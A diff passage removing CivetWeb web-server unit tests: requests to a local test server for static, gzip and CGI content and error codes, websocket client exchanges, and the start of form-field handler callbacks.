-	OPTIONS[opt_idx++] = ssl_cert;
-#endif
-	OPTIONS[opt_idx++] = "cgi_environment";
-	cgi_env_opt = (char *)calloc(1, 4096 /* CGI_ENVIRONMENT_SIZE */);
-	ck_assert_ptr_ne(cgi_env_opt, NULL);
-	cgi_env_opt[0] = 'x';
-	cgi_env_opt[1] = '=';
-	memset(cgi_env_opt + 2, 'y', 4090); /* Add large env field, so the server
-	                                     * must reallocate buffers. */
-	OPTIONS[opt_idx++] = cgi_env_opt;
-
-	OPTIONS[opt_idx++] = "num_threads";
-	OPTIONS[opt_idx++] = "2";
-
-
-	ck_assert_int_le(opt_idx, (int)(sizeof(OPTIONS) / sizeof(OPTIONS[0])));
-	ck_assert(OPTIONS[sizeof(OPTIONS) / sizeof(OPTIONS[0]) - 1] == NULL);
-	ck_assert(OPTIONS[sizeof(OPTIONS) / sizeof(OPTIONS[0]) - 2] == NULL);
-
-	ctx = test_mg_start(NULL, &g_ctx, OPTIONS);
-
-	ck_assert(ctx != NULL);
-	g_ctx = ctx;
-
-	opt = mg_get_option(ctx, "listening_ports");
-	ck_assert_str_eq(opt, HTTP_PORT);
-
-	opt = mg_get_option(ctx, "cgi_environment");
-	ck_assert_ptr_ne(opt, cgi_env_opt);
-	ck_assert_int_eq((int)opt[0], (int)cgi_env_opt[0]);
-	ck_assert_int_eq((int)opt[1], (int)cgi_env_opt[1]);
-	ck_assert_int_eq((int)opt[2], (int)cgi_env_opt[2]);
-	ck_assert_int_eq((int)opt[3], (int)cgi_env_opt[3]);
-	/* full length string compare will reach limit in the implementation
-	 * of the check unit test framework */
-	{
-		size_t len_check_1 = strlen(opt);
-		size_t len_check_2 = strlen(cgi_env_opt);
-		ck_assert_uint_eq(len_check_1, len_check_2);
-	}
-
-	/* We don't need the original anymore, the server has a private copy */
-	free(cgi_env_opt);
-
-	opt = mg_get_option(ctx, "throttle");
-	ck_assert_str_eq(opt, "");
-
-	opt = mg_get_option(ctx, "unknown_option_name");
-	ck_assert(opt == NULL);
-
-	for (i = 0; i < 1000; i++) {
-		sprintf(uri, "/U%u", i);
-		mg_set_request_handler(ctx, uri, request_test_handler, NULL);
-	}
-	for (i = 500; i < 800; i++) {
-		sprintf(uri, "/U%u", i);
-		mg_set_request_handler(ctx, uri, NULL, (void *)(ptrdiff_t)1);
-	}
-	for (i = 600; i >= 0; i--) {
-		sprintf(uri, "/U%u", i);
-		mg_set_request_handler(ctx, uri, NULL, (void *)(ptrdiff_t)2);
-	}
-	for (i = 750; i <= 1000; i++) {
-		sprintf(uri, "/U%u", i);
-		mg_set_request_handler(ctx, uri, NULL, (void *)(ptrdiff_t)3);
-	}
-	for (i = 5; i < 9; i++) {
-		sprintf(uri, "/U%u", i);
-		mg_set_request_handler(ctx,
-		                       uri,
-		                       request_test_handler,
-		                       (void *)(ptrdiff_t)i);
-	}
-
-#ifdef USE_WEBSOCKET
-	mg_set_websocket_handler(ctx,
-	                         "/websocket",
-	                         websock_server_connect,
-	                         websock_server_ready,
-	                         websock_server_data,
-	                         websock_server_close,
-	                         (void *)(ptrdiff_t)7531);
-#endif
-
-	/* Try to load non existing file */
-	client_conn = mg_download("localhost",
-	                          ipv4_port,
-	                          0,
-	                          ebuf,
-	                          sizeof(ebuf),
-	                          "%s",
-	                          "GET /file/not/found HTTP/1.0\r\n\r\n");
-	ck_assert(client_conn != NULL);
-	ri = mg_get_request_info(client_conn);
-
-	ck_assert(ri != NULL);
-	ck_assert_str_eq(ri->local_uri, "404");
-	mg_close_connection(client_conn);
-
-	/* Get data from callback */
-	client_conn = mg_download(
-	    "localhost", ipv4_port, 0, ebuf, sizeof(ebuf), "%s", request);
-	ck_assert(client_conn != NULL);
-	ri = mg_get_request_info(client_conn);
-
-	ck_assert(ri != NULL);
-	ck_assert_str_eq(ri->local_uri, "200");
-	i = mg_read(client_conn, buf, sizeof(buf));
-	ck_assert_int_eq(i, (int)strlen(expected));
-	buf[i] = 0;
-	ck_assert_str_eq(buf, expected);
-	mg_close_connection(client_conn);
-
-	/* Get data from callback using http://127.0.0.1 */
-	client_conn = mg_download(
-	    "127.0.0.1", ipv4_port, 0, ebuf, sizeof(ebuf), "%s", request);
-	ck_assert(client_conn != NULL);
-	ri = mg_get_request_info(client_conn);
-
-	ck_assert(ri != NULL);
-	ck_assert_str_eq(ri->local_uri, "200");
-	i = mg_read(client_conn, buf, sizeof(buf));
-	if ((i >= 0) && ((size_t)i < sizeof(buf))) {
-		buf[i] = 0;
-	} else {
-		ck_abort_msg(
-		    "ERROR: test_request_handlers: read returned %i (>=0, <%i)",
-		    (int)i,
-		    (int)sizeof(buf));
-	}
-	ck_assert((int)i < (int)sizeof(buf));
-	ck_assert(i > 0);
-	ck_assert_int_eq(i, (int)strlen(expected));
-	buf[i] = 0;
-	ck_assert_str_eq(buf, expected);
-	mg_close_connection(client_conn);
-
-#if defined(USE_IPV6)
-	/* Get data from callback using http://[::1] */
-	client_conn =
-	    mg_download("[::1]", ipv6_port, 0, ebuf, sizeof(ebuf), "%s", request);
-	ck_assert(client_conn != NULL);
-	ri = mg_get_request_info(client_conn);
-
-	ck_assert(ri != NULL);
-	ck_assert_str_eq(ri->local_uri, "200");
-	i = mg_read(client_conn, buf, sizeof(buf));
-	ck_assert_int_eq(i, (int)strlen(expected));
-	buf[i] = 0;
-	ck_assert_str_eq(buf, expected);
-	mg_close_connection(client_conn);
-#endif
-
-#if !defined(NO_SSL)
-	/* Get data from callback using https://127.0.0.1 */
-	client_conn = mg_download(
-	    "127.0.0.1", ipv4s_port, 1, ebuf, sizeof(ebuf), "%s", request);
-	ck_assert(client_conn != NULL);
-	ri = mg_get_request_info(client_conn);
-
-	ck_assert(ri != NULL);
-	ck_assert_str_eq(ri->local_uri, "200");
-	i = mg_read(client_conn, buf, sizeof(buf));
-	ck_assert_int_eq(i, (int)strlen(expected));
-	buf[i] = 0;
-	ck_assert_str_eq(buf, expected);
-	mg_close_connection(client_conn);
-
-	/* Get redirect from callback using http://127.0.0.1 */
-	client_conn = mg_download(
-	    "127.0.0.1", ipv4r_port, 0, ebuf, sizeof(ebuf), "%s", request);
-	ck_assert(client_conn != NULL);
-	ri = mg_get_request_info(client_conn);
-
-	ck_assert(ri != NULL);
-	ck_assert_str_eq(ri->local_uri, "302");
-	i = mg_read(client_conn, buf, sizeof(buf));
-	ck_assert_int_eq(i, -1);
-	mg_close_connection(client_conn);
-#endif
-
-#if defined(USE_IPV6) && !defined(NO_SSL)
-	/* Get data from callback using https://[::1] */
-	client_conn =
-	    mg_download("[::1]", ipv6s_port, 1, ebuf, sizeof(ebuf), "%s", request);
-	ck_assert(client_conn != NULL);
-	ri = mg_get_request_info(client_conn);
-
-	ck_assert(ri != NULL);
-	ck_assert_str_eq(ri->local_uri, "200");
-	i = mg_read(client_conn, buf, sizeof(buf));
-	ck_assert_int_eq(i, (int)strlen(expected));
-	buf[i] = 0;
-	ck_assert_str_eq(buf, expected);
-	mg_close_connection(client_conn);
-
-	/* Get redirect from callback using http://127.0.0.1 */
-	client_conn =
-	    mg_download("[::1]", ipv6r_port, 0, ebuf, sizeof(ebuf), "%s", request);
-	ck_assert(client_conn != NULL);
-	ri = mg_get_request_info(client_conn);
-
-	ck_assert(ri != NULL);
-	ck_assert_str_eq(ri->local_uri, "302");
-	i = mg_read(client_conn, buf, sizeof(buf));
-	ck_assert_int_eq(i, -1);
-	mg_close_connection(client_conn);
-#endif
-
-/* It seems to be impossible to find out what the actual working
- * directory of the CI test environment is. Before breaking another
- * dozen of builds by trying blindly with different paths, just
- * create the file here */
-#ifdef _WIN32
-	f = fopen("test.txt", "wb");
-#else
-	f = fopen("test.txt", "w");
-#endif
-	plain_file_content = "simple text file\n";
-	fwrite(plain_file_content, 17, 1, f);
-	fclose(f);
-
-#ifdef _WIN32
-	f = fopen("test_gz.txt.gz", "wb");
-#else
-	f = fopen("test_gz.txt.gz", "w");
-#endif
-	encoded_file_content = "\x1f\x8b\x08\x08\xf8\x9d\xcb\x55\x00\x00"
-	                       "test_gz.txt"
-	                       "\x00\x01\x11\x00\xee\xff"
-	                       "zipped text file"
-	                       "\x0a\x34\x5f\xcc\x49\x11\x00\x00\x00";
-	fwrite(encoded_file_content, 1, 52, f);
-	fclose(f);
-
-#ifdef _WIN32
-	f = fopen("test.cgi", "wb");
-	cgi_script_content = "#!test.cgi.cmd\r\n";
-	fwrite(cgi_script_content, strlen(cgi_script_content), 1, f);
-	fclose(f);
-	f = fopen("test.cgi.cmd", "w");
-	cgi_script_content = "@echo off\r\n"
-	                     "echo Connection: close\r\n"
-	                     "echo Content-Type: text/plain\r\n"
-	                     "echo.\r\n"
-	                     "echo CGI test\r\n"
-	                     "\r\n";
-	fwrite(cgi_script_content, strlen(cgi_script_content), 1, f);
-	fclose(f);
-#else
-	f = fopen("test.cgi", "w");
-	cgi_script_content = "#!/bin/sh\n\n"
-	                     "printf \"Connection: close\\r\\n\"\n"
-	                     "printf \"Content-Type: text/plain\\r\\n\"\n"
-	                     "printf \"\\r\\n\"\n"
-	                     "printf \"CGI test\\r\\n\"\n"
-	                     "\n";
-	(void)fwrite(cgi_script_content, strlen(cgi_script_content), 1, f);
-	(void)fclose(f);
-	(void)system("chmod a+x test.cgi");
-#endif
-	expected_cgi_result = "CGI test";
-
-	/* Get static data */
-	client_conn = mg_download("localhost",
-	                          ipv4_port,
-	                          0,
-	                          ebuf,
-	                          sizeof(ebuf),
-	                          "%s",
-	                          "GET /test.txt HTTP/1.0\r\n\r\n");
-	ck_assert(client_conn != NULL);
-	ri = mg_get_request_info(client_conn);
-
-	ck_assert(ri != NULL);
-
-#if defined(NO_FILES)
-	ck_assert_str_eq(ri->local_uri, "404");
-#else
-	ck_assert_str_eq(ri->local_uri, "200");
-	i = mg_read(client_conn, buf, sizeof(buf));
-	ck_assert_int_eq(i, 17);
-	if ((i >= 0) && (i < (int)sizeof(buf))) {
-		buf[i] = 0;
-	}
-	ck_assert_str_eq(buf, plain_file_content);
-#endif
-	mg_close_connection(client_conn);
-
-
-	/* Check if CGI test executable exists */
-	memset(&st, 0, sizeof(st));
-
-#if defined(_WIN32)
-	/* TODO: not yet available */
-	sprintf(ebuf, "%scgi_test.cgi", locate_test_exes());
-#else
-	sprintf(ebuf, "%scgi_test.cgi", locate_test_exes());
-
-	if (stat(ebuf, &st) != 0) {
-		fprintf(stderr, "\nFile %s not found\n", ebuf);
-		fprintf(stderr,
-		        "This file needs to be compiled manually before "
-		        "starting the test\n");
-		fprintf(stderr,
-		        "e.g. by gcc test/cgi_test.c -o output/cgi_test.cgi\n\n");
-
-		/* Abort test with diagnostic message */
-		ck_abort_msg("Mandatory file %s must be built before starting the test",
-		             ebuf);
-	}
-#endif
-
-
-/* Test with CGI test executable */
-#if defined(_WIN32)
-	sprintf(cmd_buf, "copy %s\\cgi_test.cgi cgi_test.exe", locate_test_exes());
-#else
-	sprintf(cmd_buf, "cp %s/cgi_test.cgi cgi_test.cgi", locate_test_exes());
-#endif
-	(void)system(cmd_buf);
-
-#if !defined(NO_CGI) && !defined(NO_FILES) && !defined(_WIN32)
-	/* TODO: add test for windows, check with POST */
-	client_conn = mg_download(
-	    "localhost",
-	    ipv4_port,
-	    0,
-	    ebuf,
-	    sizeof(ebuf),
-	    "%s",
-	    "POST /cgi_test.cgi/x/y.z HTTP/1.0\r\nContent-Length: 3\r\n\r\nABC");
-	ck_assert(client_conn != NULL);
-	ri = mg_get_request_info(client_conn);
-
-	ck_assert(ri != NULL);
-	ck_assert_str_eq(ri->local_uri, "200");
-	mg_close_connection(client_conn);
-#endif
-
-	/* Get zipped static data - will not work if Accept-Encoding is not set */
-	client_conn = mg_download("localhost",
-	                          ipv4_port,
-	                          0,
-	                          ebuf,
-	                          sizeof(ebuf),
-	                          "%s",
-	                          "GET /test_gz.txt HTTP/1.0\r\n\r\n");
-	ck_assert(client_conn != NULL);
-	ri = mg_get_request_info(client_conn);
-
-	ck_assert(ri != NULL);
-	ck_assert_str_eq(ri->local_uri, "404");
-	mg_close_connection(client_conn);
-
-	/* Get zipped static data - with Accept-Encoding */
-	client_conn = mg_download(
-	    "localhost",
-	    ipv4_port,
-	    0,
-	    ebuf,
-	    sizeof(ebuf),
-	    "%s",
-	    "GET /test_gz.txt HTTP/1.0\r\nAccept-Encoding: gzip\r\n\r\n");
-	ck_assert(client_conn != NULL);
-	ri = mg_get_request_info(client_conn);
-
-	ck_assert(ri != NULL);
-
-#if defined(NO_FILES)
-	ck_assert_str_eq(ri->local_uri, "404");
-#else
-	ck_assert_str_eq(ri->local_uri, "200");
-	i = mg_read(client_conn, buf, sizeof(buf));
-	ck_assert_int_eq(i, 52);
-	if ((i >= 0) && (i < (int)sizeof(buf))) {
-		buf[i] = 0;
-	}
-	ck_assert_int_eq(ri->content_length, 52);
-	ck_assert_str_eq(buf, encoded_file_content);
-#endif
-	mg_close_connection(client_conn);
-
-/* Get CGI generated data */
-#if !defined(NO_CGI)
-	client_conn = mg_download("localhost",
-	                          ipv4_port,
-	                          0,
-	                          ebuf,
-	                          sizeof(ebuf),
-	                          "%s",
-	                          "GET /test.cgi HTTP/1.0\r\n\r\n");
-	ck_assert(client_conn != NULL);
-	ri = mg_get_request_info(client_conn);
-
-	ck_assert(ri != NULL);
-
-#if defined(NO_FILES)
-	ck_assert_str_eq(ri->local_uri, "404");
-
-	(void)expected_cgi_result;
-	(void)cgi_script_content;
-#else
-	i = mg_read(client_conn, buf, sizeof(buf));
-	if ((i >= 0) && (i < (int)sizeof(buf))) {
-		while ((i > 0) && ((buf[i - 1] == '\r') || (buf[i - 1] == '\n'))) {
-			i--;
-		}
-		buf[i] = 0;
-	}
-	/* ck_assert_int_eq(i, (int)strlen(expected_cgi_result)); */
-	ck_assert_str_eq(buf, expected_cgi_result);
-	ck_assert_str_eq(ri->local_uri, "200");
-	mg_close_connection(client_conn);
-#endif
-
-#else
-	(void)expected_cgi_result;
-	(void)cgi_script_content;
-#endif
-
-	/* Get directory listing */
-	client_conn = mg_download("localhost",
-	                          ipv4_port,
-	                          0,
-	                          ebuf,
-	                          sizeof(ebuf),
-	                          "%s",
-	                          "GET / HTTP/1.0\r\n\r\n");
-	ck_assert(client_conn != NULL);
-	ri = mg_get_request_info(client_conn);
-
-	ck_assert(ri != NULL);
-#if defined(NO_FILES)
-	ck_assert_str_eq(ri->local_uri, "404");
-#else
-	ck_assert_str_eq(ri->local_uri, "200");
-	i = mg_read(client_conn, buf, sizeof(buf));
-	ck_assert(i > 6);
-	buf[6] = 0;
-	ck_assert_str_eq(buf, "<html>");
-#endif
-	mg_close_connection(client_conn);
-
-	/* POST to static file (will not work) */
-	client_conn = mg_download("localhost",
-	                          ipv4_port,
-	                          0,
-	                          ebuf,
-	                          sizeof(ebuf),
-	                          "%s",
-	                          "POST /test.txt HTTP/1.0\r\n\r\n");
-	ck_assert(client_conn != NULL);
-	ri = mg_get_request_info(client_conn);
-
-	ck_assert(ri != NULL);
-#if defined(NO_FILES)
-	ck_assert_str_eq(ri->local_uri, "404");
-#else
-	ck_assert_str_eq(ri->local_uri, "405");
-	i = mg_read(client_conn, buf, sizeof(buf));
-	ck_assert(i >= 29);
-	buf[29] = 0;
-	ck_assert_str_eq(buf, "Error 405: Method Not Allowed");
-#endif
-	mg_close_connection(client_conn);
-
-	/* PUT to static file (will not work) */
-	client_conn = mg_download("localhost",
-	                          ipv4_port,
-	                          0,
-	                          ebuf,
-	                          sizeof(ebuf),
-	                          "%s",
-	                          "PUT /test.txt HTTP/1.0\r\n\r\n");
-	ck_assert(client_conn != NULL);
-	ri = mg_get_request_info(client_conn);
-
-	ck_assert(ri != NULL);
-#if defined(NO_FILES)
-	ck_assert_str_eq(ri->local_uri, "405"); /* method not allowed */
-#else
-	ck_assert_str_eq(ri->local_uri, "401"); /* not authorized */
-#endif
-	mg_close_connection(client_conn);
-
-
-	/* Get data from callback using mg_connect_client instead of mg_download */
-	memset(ebuf, 0, sizeof(ebuf));
-	client_conn =
-	    mg_connect_client("127.0.0.1", ipv4_port, 0, ebuf, sizeof(ebuf));
-
-	ck_assert_str_eq(ebuf, "");
-	ck_assert(client_conn != NULL);
-
-	mg_printf(client_conn, "%s", request);
-
-	i = mg_get_response(client_conn, ebuf, sizeof(ebuf), 10000);
-	ck_assert_int_ge(i, 0);
-	ck_assert_str_eq(ebuf, "");
-
-	ri = mg_get_request_info(client_conn);
-
-	ck_assert(ri != NULL);
-	ck_assert_str_eq(ri->local_uri, "200");
-	i = mg_read(client_conn, buf, sizeof(buf));
-	ck_assert_int_eq(i, (int)strlen(expected));
-	buf[i] = 0;
-	ck_assert_str_eq(buf, expected);
-	mg_close_connection(client_conn);
-
-	/* Get data from callback using mg_connect_client and absolute URI */
-	memset(ebuf, 0, sizeof(ebuf));
-	client_conn =
-	    mg_connect_client("localhost", ipv4_port, 0, ebuf, sizeof(ebuf));
-
-	ck_assert_str_eq(ebuf, "");
-	ck_assert(client_conn != NULL);
-
-	mg_printf(client_conn,
-	          "GET http://test.domain:%d/U7 HTTP/1.0\r\n\r\n",
-	          ipv4_port);
-
-	i = mg_get_response(client_conn, ebuf, sizeof(ebuf), 10000);
-	ck_assert_int_ge(i, 0);
-	ck_assert_str_eq(ebuf, "");
-
-	ri = mg_get_request_info(client_conn);
-
-	ck_assert(ri != NULL);
-	ck_assert_str_eq(ri->local_uri, "200");
-	i = mg_read(client_conn, buf, sizeof(buf));
-	ck_assert_int_eq(i, (int)strlen(expected));
-	buf[i] = 0;
-	ck_assert_str_eq(buf, expected);
-	mg_close_connection(client_conn);
-
-	/* Get data from callback using mg_connect_client and absolute URI with a
-	 * sub-domain */
-	memset(ebuf, 0, sizeof(ebuf));
-	client_conn =
-	    mg_connect_client("localhost", ipv4_port, 0, ebuf, sizeof(ebuf));
-
-	ck_assert_str_eq(ebuf, "");
-	ck_assert(client_conn != NULL);
-
-	mg_printf(client_conn,
-	          "GET http://subdomain.test.domain:%d/U7 HTTP/1.0\r\n\r\n",
-	          ipv4_port);
-
-	i = mg_get_response(client_conn, ebuf, sizeof(ebuf), 10000);
-	ck_assert_int_ge(i, 0);
-	ck_assert_str_eq(ebuf, "");
-
-	ri = mg_get_request_info(client_conn);
-
-	ck_assert(ri != NULL);
-	ck_assert_str_eq(ri->local_uri, "200");
-	i = mg_read(client_conn, buf, sizeof(buf));
-	ck_assert_int_eq(i, (int)strlen(expected));
-	buf[i] = 0;
-	ck_assert_str_eq(buf, expected);
-	mg_close_connection(client_conn);
-
-
-/* Websocket test */
-#ifdef USE_WEBSOCKET
-	/* Then connect a first client */
-	ws_client1_conn =
-	    mg_connect_websocket_client("localhost",
-	                                ipv4_port,
-	                                0,
-	                                ebuf,
-	                                sizeof(ebuf),
-	                                "/websocket",
-	                                NULL,
-	                                websocket_client_data_handler,
-	                                websocket_client_close_handler,
-	                                &ws_client1_data);
-
-	ck_assert(ws_client1_conn != NULL);
-
-	wait_not_null(
-	    &(ws_client1_data.data)); /* Wait for the websocket welcome message */
-	ck_assert_int_eq(ws_client1_data.closed, 0);
-	ck_assert_int_eq(ws_client2_data.closed, 0);
-	ck_assert_int_eq(ws_client3_data.closed, 0);
-	ck_assert(ws_client2_data.data == NULL);
-	ck_assert_uint_eq(ws_client2_data.len, 0);
-	ck_assert(ws_client1_data.data != NULL);
-	ck_assert_uint_eq(ws_client1_data.len, websocket_welcome_msg_len);
-	ck_assert(!memcmp(ws_client1_data.data,
-	                  websocket_welcome_msg,
-	                  websocket_welcome_msg_len));
-	free(ws_client1_data.data);
-	ws_client1_data.data = NULL;
-	ws_client1_data.len = 0;
-
-	mg_websocket_client_write(ws_client1_conn,
-	                          WEBSOCKET_OPCODE_TEXT,
-	                          "data1",
-	                          5);
-
-	wait_not_null(
-	    &(ws_client1_data
-	          .data)); /* Wait for the websocket acknowledge message */
-	ck_assert_int_eq(ws_client1_data.closed, 0);
-	ck_assert_int_eq(ws_client2_data.closed, 0);
-	ck_assert(ws_client2_data.data == NULL);
-	ck_assert_uint_eq(ws_client2_data.len, 0);
-	ck_assert(ws_client1_data.data != NULL);
-	ck_assert_uint_eq(ws_client1_data.len, 3);
-	ck_assert(!memcmp(ws_client1_data.data, "ok1", 3));
-	free(ws_client1_data.data);
-	ws_client1_data.data = NULL;
-	ws_client1_data.len = 0;
-
-/* Now connect a second client */
-#ifdef USE_IPV6
-	ws_client2_conn =
-	    mg_connect_websocket_client("[::1]",
-	                                ipv6_port,
-	                                0,
-	                                ebuf,
-	                                sizeof(ebuf),
-	                                "/websocket",
-	                                NULL,
-	                                websocket_client_data_handler,
-	                                websocket_client_close_handler,
-	                                &ws_client2_data);
-#else
-	ws_client2_conn =
-	    mg_connect_websocket_client("127.0.0.1",
-	                                ipv4_port,
-	                                0,
-	                                ebuf,
-	                                sizeof(ebuf),
-	                                "/websocket",
-	                                NULL,
-	                                websocket_client_data_handler,
-	                                websocket_client_close_handler,
-	                                &ws_client2_data);
-#endif
-	ck_assert(ws_client2_conn != NULL);
-
-	wait_not_null(
-	    &(ws_client2_data.data)); /* Wait for the websocket welcome message */
-	ck_assert(ws_client1_data.closed == 0);
-	ck_assert(ws_client2_data.closed == 0);
-	ck_assert(ws_client1_data.data == NULL);
-	ck_assert(ws_client1_data.len == 0);
-	ck_assert(ws_client2_data.data != NULL);
-	ck_assert(ws_client2_data.len == websocket_welcome_msg_len);
-	ck_assert(!memcmp(ws_client2_data.data,
-	                  websocket_welcome_msg,
-	                  websocket_welcome_msg_len));
-	free(ws_client2_data.data);
-	ws_client2_data.data = NULL;
-	ws_client2_data.len = 0;
-
-	mg_websocket_client_write(ws_client1_conn,
-	                          WEBSOCKET_OPCODE_TEXT,
-	                          "data2",
-	                          5);
-
-	wait_not_null(
-	    &(ws_client1_data
-	          .data)); /* Wait for the websocket acknowledge message */
-
-	ck_assert(ws_client1_data.closed == 0);
-	ck_assert(ws_client2_data.closed == 0);
-	ck_assert(ws_client2_data.data == NULL);
-	ck_assert(ws_client2_data.len == 0);
-	ck_assert(ws_client1_data.data != NULL);
-	ck_assert(ws_client1_data.len == 4);
-	ck_assert(!memcmp(ws_client1_data.data, "ok 2", 4));
-	free(ws_client1_data.data);
-	ws_client1_data.data = NULL;
-	ws_client1_data.len = 0;
-
-	mg_websocket_client_write(ws_client1_conn, WEBSOCKET_OPCODE_TEXT, "bye", 3);
-
-	wait_not_null(
-	    &(ws_client1_data.data)); /* Wait for the websocket goodbye message */
-
-	ck_assert(ws_client1_data.closed == 0);
-	ck_assert(ws_client2_data.closed == 0);
-	ck_assert(ws_client2_data.data == NULL);
-	ck_assert(ws_client2_data.len == 0);
-	ck_assert(ws_client1_data.data != NULL);
-	ck_assert(ws_client1_data.len == websocket_goodbye_msg_len);
-	ck_assert(!memcmp(ws_client1_data.data,
-	                  websocket_goodbye_msg,
-	                  websocket_goodbye_msg_len));
-	free(ws_client1_data.data);
-	ws_client1_data.data = NULL;
-	ws_client1_data.len = 0;
-
-	ck_assert(ws_client1_data.closed == 0); /* Not closed */
-
-	mg_close_connection(ws_client1_conn);
-
-	test_sleep(3); /* Won't get any message */
-
-	ck_assert(ws_client1_data.closed == 1); /* Closed */
-
-	ck_assert(ws_client2_data.closed == 0);
-	ck_assert(ws_client1_data.data == NULL);
-	ck_assert(ws_client1_data.len == 0);
-	ck_assert(ws_client2_data.data == NULL);
-	ck_assert(ws_client2_data.len == 0);
-
-	mg_websocket_client_write(ws_client2_conn, WEBSOCKET_OPCODE_TEXT, "bye", 3);
-
-	wait_not_null(
-	    &(ws_client2_data.data)); /* Wait for the websocket goodbye message */
-
-	ck_assert(ws_client1_data.closed == 1);
-	ck_assert(ws_client2_data.closed == 0);
-	ck_assert(ws_client1_data.data == NULL);
-	ck_assert(ws_client1_data.len == 0);
-	ck_assert(ws_client2_data.data != NULL);
-	ck_assert(ws_client2_data.len == websocket_goodbye_msg_len);
-	ck_assert(!memcmp(ws_client2_data.data,
-	                  websocket_goodbye_msg,
-	                  websocket_goodbye_msg_len));
-	free(ws_client2_data.data);
-	ws_client2_data.data = NULL;
-	ws_client2_data.len = 0;
-
-	mg_close_connection(ws_client2_conn);
-
-	test_sleep(3); /* Won't get any message */
-
-	ck_assert(ws_client1_data.closed == 1);
-	ck_assert(ws_client2_data.closed == 1);
-	ck_assert(ws_client1_data.data == NULL);
-	ck_assert(ws_client1_data.len == 0);
-	ck_assert(ws_client2_data.data == NULL);
-	ck_assert(ws_client2_data.len == 0);
-
-	/* Connect client 3 */
-	ws_client3_conn =
-	    mg_connect_websocket_client("localhost",
-#if defined(NO_SSL)
-	                                ipv4_port,
-	                                0,
-#else
-	                                ipv4s_port,
-	                                1,
-#endif
-	                                ebuf,
-	                                sizeof(ebuf),
-	                                "/websocket",
-	                                NULL,
-	                                websocket_client_data_handler,
-	                                websocket_client_close_handler,
-	                                &ws_client3_data);
-
-	ck_assert(ws_client3_conn != NULL);
-
-	wait_not_null(
-	    &(ws_client3_data.data)); /* Wait for the websocket welcome message */
-	ck_assert(ws_client1_data.closed == 1);
-	ck_assert(ws_client2_data.closed == 1);
-	ck_assert(ws_client3_data.closed == 0);
-	ck_assert(ws_client1_data.data == NULL);
-	ck_assert(ws_client1_data.len == 0);
-	ck_assert(ws_client2_data.data == NULL);
-	ck_assert(ws_client2_data.len == 0);
-	ck_assert(ws_client3_data.data != NULL);
-	ck_assert(ws_client3_data.len == websocket_welcome_msg_len);
-	ck_assert(!memcmp(ws_client3_data.data,
-	                  websocket_welcome_msg,
-	                  websocket_welcome_msg_len));
-	free(ws_client3_data.data);
-	ws_client3_data.data = NULL;
-	ws_client3_data.len = 0;
-
-	/* Write long data (16 bit size header) */
-	mg_websocket_client_write(ws_client3_conn,
-	                          WEBSOCKET_OPCODE_BINARY,
-	                          long_ws_buf,
-	                          long_ws_buf_len_16);
-
-	/* Wait for the response */
-	wait_not_null(&(ws_client3_data.data));
-
-	ck_assert_int_eq((int)ws_client3_data.len, (int)long_ws_buf_len_16);
-	ck_assert(!memcmp(ws_client3_data.data, long_ws_buf, long_ws_buf_len_16));
-	free(ws_client3_data.data);
-	ws_client3_data.data = NULL;
-	ws_client3_data.len = 0;
-
-	/* Write long data (64 bit size header) */
-	mg_websocket_client_write(ws_client3_conn,
-	                          WEBSOCKET_OPCODE_BINARY,
-	                          long_ws_buf,
-	                          long_ws_buf_len_64);
-
-	/* Wait for the response */
-	wait_not_null(&(ws_client3_data.data));
-
-	ck_assert_int_eq((int)ws_client3_data.len, (int)long_ws_buf_len_64);
-	ck_assert(!memcmp(ws_client3_data.data, long_ws_buf, long_ws_buf_len_64));
-	free(ws_client3_data.data);
-	ws_client3_data.data = NULL;
-	ws_client3_data.len = 0;
-
-	/* Disconnect client 3 */
-	ck_assert(ws_client3_data.closed == 0);
-	mg_close_connection(ws_client3_conn);
-	ck_assert(ws_client3_data.closed == 1);
-
-	/* Connect client 4 */
-	ws_client4_conn =
-	    mg_connect_websocket_client("localhost",
-#if defined(NO_SSL)
-	                                ipv4_port,
-	                                0,
-#else
-	                                ipv4s_port,
-	                                1,
-#endif
-	                                ebuf,
-	                                sizeof(ebuf),
-	                                "/websocket",
-	                                NULL,
-	                                websocket_client_data_handler,
-	                                websocket_client_close_handler,
-	                                &ws_client4_data);
-
-	ck_assert(ws_client4_conn != NULL);
-
-	wait_not_null(
-	    &(ws_client4_data.data)); /* Wait for the websocket welcome message */
-	ck_assert(ws_client1_data.closed == 1);
-	ck_assert(ws_client2_data.closed == 1);
-	ck_assert(ws_client3_data.closed == 1);
-	ck_assert(ws_client4_data.closed == 0);
-	ck_assert(ws_client4_data.data != NULL);
-	ck_assert(ws_client4_data.len == websocket_welcome_msg_len);
-	ck_assert(!memcmp(ws_client4_data.data,
-	                  websocket_welcome_msg,
-	                  websocket_welcome_msg_len));
-	free(ws_client4_data.data);
-	ws_client4_data.data = NULL;
-	ws_client4_data.len = 0;
-
-/* stop the server without closing this connection */
-
-#endif
-
-	/* Close the server */
-	g_ctx = NULL;
-	test_mg_stop(ctx);
-	mark_point();
-
-#ifdef USE_WEBSOCKET
-	for (i = 0; i < 100; i++) {
-		test_sleep(1);
-		if (ws_client3_data.closed != 0) {
-			mark_point();
-			break;
-		}
-	}
-
-	ck_assert_int_eq(ws_client4_data.closed, 1);
-
-	/* Free data in ws_client4_conn */
-	mg_close_connection(ws_client4_conn);
-
-#endif
-	mark_point();
-}
-END_TEST
-
-
-static int g_field_found_return = -999;
-
-static int
-field_found(const char *key,
-            const char *filename,
-            char *path,
-            size_t pathlen,
-            void *user_data)
-{
-	ck_assert_ptr_ne(key, NULL);
-	ck_assert_ptr_ne(filename, NULL);
-	ck_assert_ptr_ne(path, NULL);
-	ck_assert_uint_gt(pathlen, 128);
-	ck_assert_ptr_eq(user_data, (void *)&g_field_found_return);
-
-	ck_assert((g_field_found_return == FORM_FIELD_STORAGE_GET)
-	          || (g_field_found_return == FORM_FIELD_STORAGE_STORE)
-	          || (g_field_found_return == FORM_FIELD_STORAGE_SKIP)
-	          || (g_field_found_return == FORM_FIELD_STORAGE_ABORT));
-
-	ck_assert_str_ne(key, "dontread");
-
-	if (!strcmp(key, "break_field_handler")) {
-		return FORM_FIELD_STORAGE_ABORT;
-	}
-	if (!strcmp(key, "continue_field_handler")) {
-		return FORM_FIELD_STORAGE_SKIP;
-	}
-
-	if (g_field_found_return == FORM_FIELD_STORAGE_STORE) {
-		strncpy(path, key, pathlen - 8);
-		strcat(path, ".txt");
-	}
-
-	mark_point();
-
-	return g_field_found_return;
-}
-
-
-static int g_field_step;
-
-static int
-field_get(const char *key,
-          const char *value_untruncated,
-          size_t valuelen,
-          void *user_data)
-{
-	/* Copy the untruncated value, so string compare functions can be used. */
